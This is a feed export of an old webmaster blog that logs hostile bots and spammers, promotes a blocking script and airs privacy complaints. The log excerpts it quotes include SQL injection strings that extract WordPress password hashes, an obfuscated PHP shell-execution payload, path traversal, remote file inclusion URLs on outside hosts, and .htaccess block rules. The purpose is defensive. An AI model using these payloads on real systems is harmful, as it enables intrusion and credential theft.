tag:blogger.com,1999:blog-33923218
2016-02-17T16:27:10.867-06:00
Web Robots
Web robots are visiting sites to hack, spam, harvest email addresses and scrape your website content for profit.
This blog is an attempt to keep track of them and to help webmasters by listing the abuse in Google.
tmaster noreply@blogger.com Blogger 193 1 25

tag:blogger.com,1999:blog-33923218.post-8008534537863190045
2012-03-30T16:38:00.000-05:00 2012-03-30T16:39:21.070-05:00
New upload
M&M Autoban v4.8 has been uploaded. This version adds country ban by IP.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-5496150359850376872
2011-12-16T10:59:00.005-06:00 2011-12-16T14:01:31.866-06:00
webmasters how to disable google related
From: http://www.lunarlog.com/google-related-privacy/<br />Reposting: I have not been able to find a way to disable Google Related. If you have not seen it, you had better check out what's showing up on your website.<br /><a target='_blank' title='ImageShack - Image And Video Hosting' href='http://imageshack.us/photo/my-images/694/instawaresrelated.gif/'><img src='http://img694.imageshack.us/img694/6661/instawaresrelated.gif' border='0'/></a><br /><br /><br />File a complaint here <a href="https://www.ftccomplaintassistant.gov/">https://www.ftccomplaintassistant.gov/</a><br /><br /><blockquote>Google Related Program and My Privacy Issues<br /><br />I spent the last couple of weeks updating my main website Lunarstudio - mostly reprogramming and adding new images. When updating websites, most responsible webmasters and designers will run their site through additional browsers, operating systems, and test people’s reactions to new content. I had a friend look at my site on Sunday to see if she had any feedback. Out of the corner of my eye, I noticed a full-width bar appear at the bottom of my page on her monitor. 
My first reaction was “WTF”, followed by concern that somehow I must have uploaded malware to the back-end of my site. The third option which was slightly more worrisome is that some hackers got into my site. So I took a closer look, and the bottom left read “Google Related” (don’t install this.)<br /><br />Now, I would never think Google would have released a toolbar that covered up part of the screen. Not only was it distracting from the design I had worked so hard on, but it wouldn’t just affect me but almost every webmaster and designer on the planet. So my next thought was that it had to be some malware she accidentally downloaded over the course of her Internet travels. Upon even closer inspection, I noticed that it was serving up advertisements and contact information from competitors. So someone looking at my site could see another image at the bottom of the screen, then decide to go to that website instead.<br /><br />I started to look into this. Sure enough, it’s part of a new, 20-day old Google program which is a toolbar extension for Internet Explorer and Chrome. ArsTechnica wrote a concise article on what Google Related does here. While it might prove useful for some users, for webmasters and those concerned with privacy, this is an absolute nightmare. It represents a major downfall in Net Neutrality if this is allowed to carry on. *Aside* — some might argue that Google is not a telecom, Internet Provider, or government agency and hence doesn’t fall into the argument of threatening Net Neutrality. However, I should remind people that Google has mentioned that it’s testing their Internet Providing services. Also, Android runs on many cellphones as well as telecom providers. 
They’re basically in bed with one another.<br /><br />There’s several different and valid concerns, not to mention the legality of this program:<br /><br />1. It interferes with a person or company’s intended website design without their permission.<br />2. It potentially distracts an end-user.<br />3. It slows down a person’s website loading time. The speed issue is probably negligible, but it’s still there without an owner’s permission.<br />4. It risks having people leave your website in favor of another. Holding user retention on a landing-page is tough enough, but this just adds fuel to the fire.<br />5. Due to people wandering off one’s website, it can jeopardize website owner’s businesses and livelihoods.<br />6. Google is directly (or indirectly) profiteering from someone else’s work without their permission.<br />7. This is potentially part of their AdWords program, which makes money off of advertisements.<br />8. It allows for Google to monitor your browsing habits, even when not using Google search. It’s basically spying on your activities.<br />9. It potentially opens up the door for further abuse.<br />10. It threatens Google’s competitors (Yahoo!, Bing, and other search engines.) If successful, competitors might also have to roll out similar toolbars or methods.<br />11. It could become a permanent part of Google Chrome.<br /><br />Now, there’s some usefulness to the end-user. It wouldn’t be fair for me to mention the Google Related negatives without the positives:<br /><br />1. Provides directions.<br />2. Provides alternative solutions for someone looking for a service or help.<br /><br />I was almost positive Google would provide webmasters with a method to take this off of owner’s websites through the use of META tags, but my searches for that method turned up empty. Instead, I came across other “unapproved” methods of using CSS code to disable the iframe, either by moving the toolbar off-screen, or by hiding the iframe completely. 
Unfortunately, I tried these methods and it didn’t work. It seems that Google caught on to webmasters changing their CSS code, and in turn updated their own to prevent us from doing so.<br /><br />Since then, I’ve brought it to the attention of some friends on Facebook, however I think my concern has largely fallen on deaf ears which is understandable. I’ve also written on the Google Forum where you can see there my concern is #6. Some might call it an overreaction, but I think I’m fully justified here. The people reporting this problem is so low at the moment because Google Related is just starting to get attention. This is part of the reason why I’m writing about it on my blog — it’s to bring attention to this.<br /><br />My main issue is that Google is intruding upon my work and business without permission. The nail in the coffin is that they are also potentially profiteering without my permission too. I think it’s just a matter of time before Google is:<br /><br />1. Sued by competitors.<br />2. Department of Justice goes after them and tries to break up the monopoly.<br />3. Public outrage from the webmasters community gets out of control.<br />4. Or they disable it before it gets to any of the points listed above.<br /><br />I hope I am overly concerned, and that Google disables their new program almost as soon as it has started. However, it blows my mind how this idea got past scores of lawyers, executives, management, and employees at a billion dollar company in the first place. If you agree with my concerns, please promote this article and also express your concern on the Google Related Forum. 
If you disagree, I’m still interested in hearing your views</blockquote>
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-9176177100744717053
2011-03-11T11:02:00.001-06:00 2011-03-11T11:05:19.239-06:00
"Script Injections" list
Bots vs Browsers has a new list of all injection attempts.<br /><br />If you're keeping up with this you need to look through this list and add the keywords to block to the hackers.txt file.
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-2492036677554727333
2011-03-08T08:58:00.002-06:00 2011-03-08T09:06:57.359-06:00
mass email problems
I have just discovered that the email option of my script can trigger the mass email alarms on the free host. They use this alarm to stop spammers.<br /><br />If you're running the script on a free host you need to disable the emails until I can build an outbox system that will merge the emails into 1 message once a day.<br /><br />Go into autoban and change all mail commands to <br />//mail
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-7421842429177565226
2011-03-08T08:45:00.001-06:00 2011-03-08T08:58:23.465-06:00
182.114.206.25 hn.kd.ny.adsl union injection hacker
20and%205=6%20union%20select%200x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E%20-- <br /><br />from ip 182.114.206.25 hn.kd.ny.adsl
tmaster noreply@blogger.com 1

tag:blogger.com,1999:blog-33923218.post-3394592487899355096
2010-08-26T15:06:00.002-05:00 2010-08-26T15:10:32.558-05:00
as13448.com traffic
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SU 2.011; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1) <br 
/>All Hits From static-208-80-194-34.as13448.com 208.80.194.34 <br /><br /><br />I am getting a lot of bot traffic from lots of IPs on subdomains of as13448.com<br />The website as13448.com is not an ISP so all of those IPs need to be blocked.
tmaster noreply@blogger.com 1

tag:blogger.com,1999:blog-33923218.post-707326513680212586
2010-05-24T09:50:00.003-05:00 2010-05-24T11:10:54.300-05:00
mylife.com privacy violations.
Mylife.com is running TV advertisements and getting a lot of traffic, so I checked them out and was shocked to see that when you go to the site and enter your name, approx. age and zip, the system will come back to you and display your XXX (private info)<br /><br />Check it out yourself and once you're upset help by complaining about this huge privacy violation. They are helping create identity fraud.<br /><br />File a complaint here <a href="https://www.ftccomplaintassistant.gov/">https://www.ftccomplaintassistant.gov/</a><br /><br />And you may also want to go to www.privacyrights.org and report this so they can start tracking this company. <a href="http://www.privacyrights.org/contact">http://www.privacyrights.org/contact</a><br /><br />It is likely that they will not have this information for all states. If they do display private info on you please let us know.<br /><br />Also see <a href="http://www.complaintsboard.com/bycompany/mylifecom-a123026.html">www.complaintsboard.com</a><br /><br />Also see <a href="http://www.consumeraffairs.com/online/mylife.html">http://www.consumeraffairs.com/online/mylife.html</a><br /><br /><br />Also see <a href="http://techpaul.wordpress.com/2009/03/06/just-say-no-to-mylifecom/"> Just say no to Mylife.com</a><br /><br /><blockquote>Better Business Bureau<br />This company practices what the Los Angeles Better Business Bureau calls negative option cancellation. 
In this sales strategy, customers agree to pay for services unless they cancel within a specified period of time. Members are required to cancel prior to the initial anniversary date to avoid continuing annual charges to their credit cards.[6]<br /><br />Complaints from customers not resolved in a satisfactory manner caused the Los Angeles Better Business Bureau to rate Reunion.com 'F'.[7]<br /><br />The BBB was concerned that the company used misleading advertising practices by e-mailing customers advising them that people 'may' be searching for them, and offers them to become paid members to find the identity of any people that may search for them in the future. In its FAQ section, the Reunion.com site describes this feature as follows: "'Who's Searching For You' will reveal the listed names of the specific users who have performed a search using your first and last (current or Maiden) names and your age range within 5 years of your listed date of birth and is still saved in their Search History'.[8]<br /></blockquote>
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-3640700161148622418
2010-02-07T22:08:00.002-06:00 2010-02-07T22:13:52.375-06:00
New York spam on Road Runner
NYC Rentals<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 7:25pm<br />very nice blog.<br /><br />very nice blog. 
manhattanadmin@gmail.comNYC<br />Rentalshttp://www.nestseekers.com/Properties/Rentals/Manhattanspam<br /><br />1 #<br /> NYC Apartments<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 5:44pm<br />interesting.<br /><br /><br />1 #<br /> NYC Rentals<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 5:28pm<br />very nice blog.<br /><br /><br /><br />1 #<br /> Free Image Hosting<br />imagehosting21.com<br />admin@imagehosting21.com<br />74.68.123.67 Submitted on 2010/02/06 at 10:45am<br />good blog keep it up.<br /><br />good blog keep it up. admin@imagehosting21.comFree Image<br />Hostinghttp://www.imagehosting21.comspam<br /><br /><br />1 #<br /> Free Image Hosting<br />imagehosting21.com<br />admin@imagehosting21.com<br />74.68.123.67<br /><br /><br />Sent a complaint to RR admin and got this crap back. Looks like RR does not care about blog spam. I already sent them the time and IP of the abuser. And they ignored that.<br /><br /><br />Hello,<br /><br />Road Runner supports the free flow of information and ideas over the Internet. Road Runner does not <br />actively monitor nor does Road Runner exercise editorial control over the content of any web site, <br />electronic mail transmission, mailing list, news group or other material created or accessible over <br />Road Runner services.<br /> <br /><br />If you feel that a Road Runner subscribers activities constitute harassment and have contact <br />information for them, please write them an email, CCing Abuse@rr.com, requesting that they "cease <br />and desist" contact with you. <br /><br /><br />If you receive further contact from the Road Runner subscriber after that point, or do not have <br />contact information for them: DO NOT REPLY or correspond with that person further. 
Please instead <br />forward all documentation to abuse@rr.com, which should include: full email headers or webserver <br />logs showing posts made on a message board or other Internet forum (these would typically be <br />obtained from the administration of that site). Logs would need to contain the following <br />information, for Road Runner to process them: Date of Incident, Time of Incident, Time Zone, <br />Offender IP, URL of site or offending posts. Road Runner will not accept logs that are not in plain <br />text (ascii) format. Do not attach files to your e-mail. All logs must be included in the body of <br />the message.<br /><br />Thank you for taking the time to contact Road Runner.<br /><br />- Road Runner Abuse [SM]
tmaster noreply@blogger.com 1

tag:blogger.com,1999:blog-33923218.post-7480543805657397892
2009-06-30T17:57:00.002-05:00 2009-06-30T17:58:16.159-05:00
wrangler.websitewelcome.com bot
Agent: -NO AGENT- <br />74.52.200.178 wrangler.websitewelcome.com <br /><br />Just what is this bot? It doesn't have a useragent and the website websitewelcome.com has no info on it, just an email contact address. <br /><br />websitewelcome.com added to the block list
tmaster noreply@blogger.com 2

tag:blogger.com,1999:blog-33923218.post-3362111619879810812
2009-06-30T17:50:00.003-05:00 2009-06-30T17:55:43.828-05:00
useragent spammer www.ongarofrancesco.org
Agent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK"> <br />79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it <br /><br />This bot tries to spam your useragent logs that some sites post with links to a website at www.ongarofrancesco.org <br /><br />This looks to be some hacker ref site. 
The bot is from Italy<br /><br />This just goes to show why you should not have scripts on your site that display the useragents that you have logged to the internet, because they can contain HTML.
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-8468010791353324814
2009-06-24T18:57:00.010-05:00 2009-07-29T12:35:58.638-05:00
IE 8 breaks subdomains making them hard to read using domain highlighting
Domain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.<br /><br /><a href='http://img209.imageshack.us/i/ie8c.jpg/'><img src='http://img209.imageshack.us/img209/4404/ie8c.jpg' border='0' alt='Image Hosted by ImageShack.us'/></a><br/><br /><br />This is nuts. It makes this site read blogger.com and you cannot see the subdomain. Whose lame idea is this? It's one thing to make the main domain a different color; it's another to hide the entire URL.<br /><br />Someone has to find a way around this. There must be some way you can highlight the URL bar using java so the subdomain will be visible, or some way to force IE8 into IE7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keyword usage.<br /><br /><br />This has to be fixed.<br /><br />Microsoft is taking away our legal use of subdomains. <br />Websites that use subdomains are not crooks; we are legally using 1 domain to create many websites. Just because some crook used a subdomain they should not be hidden.<br /><br /><br />ZDNet says <a href="http://community.zdnet.co.uk/blog/0,1000000567,10008836o-2000331855b,00.htm">IE8 puts dim wits ahead of tech savvy.</a><br /><br /><a href="http://aidanwalsh.net/2008/03/on-ie8-domain-highlighting/">aidanwalsh.net</a> says <blockquote>why do you have to obfuscate the rest of the URL information by default? 
No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL. </blockquote><br /><br /><br />domain highlighting, ie 8 domain name greyed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8
tmaster noreply@blogger.com 2

tag:blogger.com,1999:blog-33923218.post-631323701720839535
2009-01-20T13:47:00.003-06:00 2009-01-20T13:55:03.494-06:00
strange code on wp blog detected
mmautoban has detected the following code being used on a WP blog.<br /><br />Anyone know what this is?<br /><br />/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20<br /><br />/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20 <br /><br 
/>/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 <br /><br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET <br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20<br /><br /><br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20<br /><br /><br /><br />%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});} <br /><br /><br />It has about 15 other versions. I suspect it is some type of attack.<br />Unless some plugin is malfunctioning. 
<br />Anyone have any info what this code is?
tmaster noreply@blogger.com 2

tag:blogger.com,1999:blog-33923218.post-956109634087466768
2009-01-15T15:40:00.002-06:00 2009-01-15T15:44:13.321-06:00
OSCommerce mods
OScommerce Notes<br />===============<br />A rare bug has been detected in OScommerce. If the customer does not select a payment at checkout the browser is redirected to <br /><br />/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order<br /><br />This generates a +select+ injection hack detection in mmautoban.<br /> To prevent this error edit your OSCommerce english.php file and change the error statement from <br />Please Select to Please Pick <br /> this will prevent customers from getting banned.<br />It is unknown if other such errors exist in other places or other programs. <br />If you see any please report them.
tmaster noreply@blogger.com 1

tag:blogger.com,1999:blog-33923218.post-8702110258839182475
2008-12-03T23:21:00.004-06:00 2008-12-03T23:27:30.401-06:00
'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hacker
Just detected this hacker. The IP is blocked by no-more-funn.moensted.dk <br /><br />What is this useragent? 
(k1b compatible; rss 6.0; windows sot 5.1 security kol)<br /><br />www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/* <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /><br />www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/* <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /> <br />www._____.com/wp-trackback.php?p=1 <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /><br />www.____.com/xmlrpc.php<br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-6641436025568485969
2008-11-20T18:10:00.004-06:00 2008-11-20T18:21:12.552-06:00
babycaleb.mvhosted.com hacker attacks
Baby hacker has moved to http://babycaleb.mvhosted.com<br /><br />And his baby bots are now trying to inject this new url into websites.<br />The site when inspected using Spam Spade to avoid any virus infection shows the exploit is in the html just like before.<br /><br />A search shows it's infected many websites. 
<a href="http://www.google.com/search?q=babycaleb.mvhosted.com">http://www.google.com</a><br />Parsing input: http://babycaleb.mvhosted.com<br />Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178<br />host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)<br />Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178<br />host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)<br />Routing details for 74.53.187.178<br />[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com<br />Using abuse net on abuse@theplanet.com<br />abuse net theplanet.com = abuse@theplanet.com<br />Using best contacts abuse@theplanet.com<br /><br /><br />Send abuse messages to theplanet.com
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-429256837983936674
2008-11-12T14:31:00.002-06:00 2008-11-12T14:35:45.947-06:00
itsapic.com/crawler.html another beta
208.43.85.166<br />Required header 'Accept' missing GET / HTTP/1.0<br />User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)<br />Connection: close<br />Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx<br /><br /><br />This bot was scanning webring looking for sites and got blocked by BB so watch for it.<br />Website does not tell what it's doing or ask permission to enter your site.<br /><br /><br />add to robots<br />User-agent: itsapic.com_crawler<br />Disallow: /
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-1460539327634244525
2008-11-08T20:31:00.014-06:00 2008-11-20T18:17:30.689-06:00
babycaleb.fortunecity.co.uk hacker now shut down.
Am getting a lot of these requests lately<br /><br />/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm <br /><br />They are from lots of IPs all trying to remote load this page. 
Inside that page is a hack attempt. AVG gives an alarm if you try to view the source.<br /><br />Do not go to the website <strong>babycaleb.fortunecity.co.uk</strong> AVG detects a virus but it still gets into your system. Look for ..<br /><strong>c:\windows\system32\tools\regexe.exe</strong> <br />a <strong>trojan horse downloader.generic8.cox </strong> <br /><br />--updated-<br />The site has now been shut down.<br /><br />A search of Google <br /><a href="http://www.google.com/search?q=babycaleb.fortunecity.co.uk">http://www.google.com/search?q=babycaleb.fortunecity.co.uk</a> shows that sites all over the net are infected with this attack and they are allowing the attack to spread. Perhaps they are involved in the attack?
tmaster noreply@blogger.com 9

tag:blogger.com,1999:blog-33923218.post-190017043625910953
2008-09-11T09:54:00.004-05:00 2008-09-11T10:15:58.740-05:00
serverkompetenz.net Hackers
serverkompetenz.net is a hacker not a spambot.<br /><br />.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1 <br />Agent: <PRE> $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = 
@$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");</pre><br /> <br />81.169.152.101 h986442.serverkompetenz.net <br /><br />Bot attempted to include some script in place of its user agent string.<br /><br />It then tried to remote load a script.<br />Blacklist Domain Ban: serverkompetenz.net <br />.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1 <br />Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank] <br />81.169.152.101 h986442.serverkompetenz.net
tmaster noreply@blogger.com 1

tag:blogger.com,1999:blog-33923218.post-3766259840119898302
2008-08-22T22:49:00.000-05:00 2008-08-23T00:00:55.594-05:00
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST
The latest hack running right now is an injection attempt using a string like this.<br /><br />DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);<br /><br />This is a bot attack and is coming from everywhere. <br />They come in 2 at a time from the same IP.<br /><br />They are trying to inject some code into your site to display an iframe that will take people to another site. It doesn't look like they are attacking PHP; they are attacking ASP, Cold Fusion and Perl. <a href="http://isc.sans.org/diary.html?storyid=4771">See more here isc.sans.org</a><br /><br />Also see this <a href="http://www.webmasterworld.com/search_engine_spiders/3725038.htm">post </a> which recommends.<br /><br /><br />RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR] <br />RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR] <br /><br />But a better page on how to block this by .htaccess is <a href="http://www.0x000000.com/?i=567">located here. 
</a><br /><br /><br />They are also scanning for a delay in page return so any script that sleeps when it detects a hack must have the sleep removed or they will come back and hit you harder.<br /><br /><br />Just the hits will bring your server down if you try to ban all the IPs being used so I have modified the hacker modules.<br /><br />Update <a href="http://www.box.net/shared/nk40gde139">hacker modules</a> Here.<br /><br /><br /><br /><br />You will also want to download your databases and scan them for IFRAMES and java script.
tmaster noreply@blogger.com 5

tag:blogger.com,1999:blog-33923218.post-3495066244174181570
2008-08-06T09:52:00.003-05:00 2008-08-06T10:00:52.410-05:00
magnum.liquidweb.com hacker
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) <br />64.91.248.2 magnum.liquidweb.com <br />string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ] <br />Hacker hits with this string trying to get my server to run his scripts.<br /><br />Then after getting banned keeps trying with this set of scripts.<br /><br />?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F <br />p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F<br /><br />They are all scripts used by hackers to display a test message on your server<br />http://chyngachanga.ru/content/wuge/owofi/<br />http://www.qubestunes.com/treytest/1/adoyuru/zagu/ <br />http://www.heaven-house.kz/templates_c/omoj/emuqir/
tmaster noreply@blogger.com 0

tag:blogger.com,1999:blog-33923218.post-8208617383450746277
2008-06-30T23:41:00.002-05:00 2008-07-15T01:32:33.254-05:00
After banning the domain amazonaws.com because they are hosting bots.<br />I get all of this. 
<br /><br />Agent: webclient <br />75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com <br />Agent: webclient <br />75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322) <br />67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com<br /> <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com <br /> <br />Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com] <br />72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com<br /> <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com<br /><br /><br />-----Update AideRSS just does not get it that they have been blocked.<br />67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com <br />[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com <br />[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com <br />[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com <br 
/>[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com <br />
Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />
67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com <br />
[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com <br />
Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />
75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com <br />
[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com <br />
Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />
75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com<br />
Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />
67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com <br /><br /><br />
Update <br /><br />
67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam<br />
67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam<br />
67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam<br />
